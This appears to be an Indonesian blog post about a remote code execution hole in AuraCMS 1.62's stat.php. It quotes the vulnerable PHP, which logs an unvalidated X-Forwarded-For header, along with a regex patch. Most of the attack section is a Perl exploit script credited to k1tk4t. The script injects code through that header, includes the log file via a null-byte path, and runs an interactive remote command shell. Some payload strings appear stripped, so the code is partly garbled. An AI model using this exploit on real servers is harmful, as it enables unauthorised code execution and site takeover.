Bug Auracms 1.62

Sebenarnya Bug ini sudah lama ditemukan tapi saya baru tau baru2 ini saja setelah baca2 artikel di newhack.org. Apa pernah website kalian terutama yg memakai engine dari auracms versi 1.62 seperti web ini kedatangan tamu yg g diundang yg menyamar sebagai administrator namanya t4mugel4p jika pernah berarti website anda telah disinggahi beliau ada kemungkinan bug yg masih belum di perbaiki pada tubuh auracms 1.62 yg anda gunakan.

Dimana letak bugnya? bug terletak pada file stats.php pada folder mod bug ini ditemukan oleh k1tk4t entah bersemedi berapa lama untuk menemukan bug ini ditemukan pada bulan januari 2008 waah lama juga kok baru tau sekarang seeh…!!! heee iya cos lagi males update n jarang2 ngenet seehh maklum kanting lagi cekak. Untung aja setelah saya cek belum ada satupun tamu yg mencoba web ini bersyukur saya heee…3x 

berikut celah yg ditemukan oleh k1tk4t :

Kutu pada berkas "stat.php" didalam direktori /mod pada aplikasi web auracms 1.62
# —//—
# 17. Function User_Online ($minutes, $NamaFile){
# 18. //$ip = $REMOTE_ADDR;
# 19. $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20. if (getenv("HTTP_X_FORWARDED_FOR") == ”){
# 21. $ip = getenv("REMOTE_ADDR");    
# 22. }
# —//—
# 47. fseek($f,0,SEEK_SET);
# 48. ftruncate($f,0);
# 49. array_pop($user);
# 50. foreach ($user as $line)
# 51.      {
# 52.     list($savedip,$savedtime) = split("|",$line);
# 53.     if ($savedip == $ip) {$savedtime = $time;$found = 1;}
# 54.     if ($time < $savedtime + ($minutes * 60))
# 55.         {
# 56.         fputs($f,"$savedip|$savedtimen");
# 57.         $users = $users + 1;
# 58.         }
# 59.     }
# 60.
# 61. if ($found == 0)
# 62.     {
# 63.     fputs($f,"$ip|$timen");
# 64.     $users = $users + 1;
# 65.     }
# 66.
# 67. fclose ($f);
# —//—
#
# Sebagai Contoh;
# $ip = getenv("HTTP_X_FORWARDED_FOR");
# $ip =   # <– user menginjeksi phpinfo
# format yang tersimpan
# |WAKTUBERKUNJUNG
#
# pada AuraCMS versi 1.62, log di simpan pada berkas /mod/online.db.txt [Default]#
# pada Mod Block Statistik, log disimpan pada berkas /logs/online.db.txt [Default]#
# pada AuraCMS versi 2.x mod "online", getenv("HTTP_X_FORWARDED_FOR") bisa berakibat terjadinya "SQL Injection"

#
# => "Perbaikan Kutu stat.php"
# —//—
# 19. $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20. if (preg_match(‘/^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$/’, getenv("HTTP_X_FORWARDED_FOR")) == ”){
# 21. $ip = getenv("REMOTE_ADDR");
# —//—

berikut exploit yg dibuat oleh k1tk4t, tapi jangan di coba ya….!!! klo ada yg menyala gunakan exploit ini saya tidak tanggung jawab loech gitu e katae k1k4t hee…

# —————————-[Mulai]————————————
use IO::Socket;

if(!$ARGV[2])
{
 print "n  |——————————————————-|";
 print "n  |            Indonesian Newhack Technology              |";
 print "n  |——————————————————-|";
 print "n  | AuraCMS 1.62 (stat.php) Remote Code Execution Exploit |";
 print "n  |                  Coded by k1tk4t                      |";
 print "n  |——————————————————-|";
 print "n[!] ";
 print "n[!] Penggunaan : perl auracms162.pl [Site] [Path] [Port]";
 print "n[!] Contoh     : perl auracms162.pl localhost /aura162/ 80";
 print "n[!] ";
 print "n";
 exit;
}

$oriserver = $ARGV[0];
$orihost   = "http://".$oriserver;
$oridir    = $ARGV[1];
$oriport   = $ARGV[2];

print "- Melakukan Koneksi $orihost$oridirrn";
 
$injurl = "index.php?pilih=stat&mod=yes";
$injeksi = $oridir.$injurl;
$kodeterlarang = "";
print "- Sedang menginjeksi kode jahatrn";
$injkode =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal…rn";
print $injkode "GET ".$injeksi." HTTP/1.1n";
print $injkode "Host: ".$oriserver."rn";
print $injkode "X-Forwarded-For: ".$kodeterlarang."rn";
print $injkode "rnrn";
close ($injkode);

while($perintah !~ "mati")
{
$ekseurl = "index.php?pilih=online.db.txt%00&mod=yes&cmd=".$perintah."";
$eksekusi = $oridir.$ekseurl;
print "- Sedang mencoba menjalankan kode injeksirn";
$eksekode =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal…rn";
print $eksekode "GET ".$eksekusi." HTTP/1.1n";
print $eksekode "Host: ".$oriserver."rn";
print $eksekode "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11";
print $eksekode "Accept: */*rn";
print $eksekode "Connection: closernn";

while ($hasil = <$eksekode>)
    {
    print $hasil;
    }
print "[+]perintah => ";
$perintah = ; 
}

About Administrator

2016-01-12 10:32:36 2016-01-12 14:33:42

Check Also

Cara root Nokia X Nokia X2 Nokia X2 Dual Sim Nokia XL

Ikuti caranya dengan seksama :-> Langkah pertama Buka Nokia X kalian-> Selanjutnya buka “PENGATURAN” jika polsel Nokia …

Tinggalkan Balasan

Translate »
error: Konten dilindungi !!